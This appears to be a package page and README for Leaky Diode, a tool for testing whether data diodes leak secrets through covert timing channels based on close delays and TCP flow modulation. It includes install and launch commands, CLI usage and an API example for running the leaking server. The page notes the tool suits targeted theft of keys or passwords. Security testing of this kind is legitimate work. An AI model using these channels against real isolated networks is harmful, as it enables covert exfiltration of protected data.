Leaky Diode is a data exfiltration test tool for data diodes, using flow modulation and close delay attacks
Leaky diode is a data exfiltration test tool for smart data diodes, that is data diodes with support for TCP pass-through with the help of some side channel from the isolated side. The attacks used are flow modulation and/or close delay:
CLOSE DELAY uses the delay between the request of one the secret's bits and the time the server closes the connection to encode the bit value. (i.e.- 10 seconds delay means a 0, 30 seconds delay a 1)
FLOW MODULATION uses tcp flow control mechanism to encode secret's bits as a transfer speed. For example if the the bit requested by the client is 1 the server throttles the speed to 300KB/s, if it's 0 to 100KB/s. The advantage of this attack is that using a single connection makes it harder to detect.
Download the package or clone the repository, and then install with:
python3 setup.py install
or use pypi:
pip install leaky_diode
On the isolated side launch the server:
leaky_server public_ip port 'secret string that needs leaking'
On the untrusted side launch the client and select one of the attacks,
leaky_client server_ip server_port --mode flow --partial
leaky_client server_ip server_port --mode close --partial
And just wait a few minutes to receive the first byte (it's the slowest), if you're not sure if it's working add --verbose option so it prints messages on each received bit.
usage: leaky_client [-h] [--mode mode] [--low_delay delay] [--high_delay delay] [--low_rate rate] [--high_rate rate] [--sample_time time] [--settle_time time] [--partial] host port Leaky Diode is a data exfiltration test tool for data diodes positional arguments: host Remore host address port Remote host port optional arguments: -h, --help Show this help message and exit --mode mode, -m mode Attack mode 'flow' or 'close' (default: flow) --low_delay delay Close delay for low bits (default: 5s) (only Close Mode) --high_delay delay Close delay for high bits (default: 10s) (only Close Mode) --low_rate rate Tx rate for low bits (default: 64 KB/s) (only Flow Mode) --high_rate rate Tx rate for high bits (default: 300 KB/s) (only Flow Mode) --sample_time time Tx rate sampling interval (default: 3.0s) (only Flow Mode) --settle_time time Settle time between sending a bit request and the start of sampling (default: 8.0s) (only Flow Mode) --partial Show partial results each time another byte from the secret is received --verbose Show debugging messages
usage: leaky_server [-h] host port secret_string Leaky Diode is a data exfiltration test tool for data diodes positional arguments: host Remore host address port Remote host port secret_string Attack mode 'flow' or 'close' (default: a secret string) optional arguments: -h, --help Show this help message and exit -v, --verbose Show debugging messages
The attack throughput with the default parameters is around 1 B/min (yes, one byte per minute), you can increase it by lowering the delay times in close delay mode, and the settle/sample times in flow modulation (the default values are very conservative)
An actual exfiltration attempt using this attack could easily leak a few KB per day, too slow for large breachs, but enough for targeted attacks for keys/passwords or selected users data.
It is also possible to use leaky_diode as a package and include a server in your own app:
class LeakyServer(host, port, secret, ticks=100, max_connections=10)
host: (str) Listen interface ip addres ('' for all)
port: (int) Listen port
secret: (bytes) Secret to leak (max length 65535)
ticks: (int) Ticks per second the worker process use to throttle the connections.
max_connections: (int) Max concurrent connection the server can handle.
start(): Initialize and launch server worker processes
stop(): Stop server and its workers
from leaky_diode import LeakyServer leaky_server = LeakyServer('192.168.0.10', 9000, b'some secret byte string') leaky_server.start() # Do something else ...... # Close server before exit leaky_server.close()
- Harden message parsing input validation (invalid lengths)
- Use concurrent connection to increase exfiltration speed.
- Tune flow modulation mode tx speeds .
- Tune close delay mode delays.
- Add CRC to the secret and secret length, or even better error correction.
- Add resume capability so there is no need to get the secret in one go.
- Add some tests.
- Data Diodes Wikipedia
- Place holder so I remember to publish a post on the attacks
- And another on transport and streaming protocols for data diodes
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Hashes for leaky_diode-0.1.1-py3-none-any.whl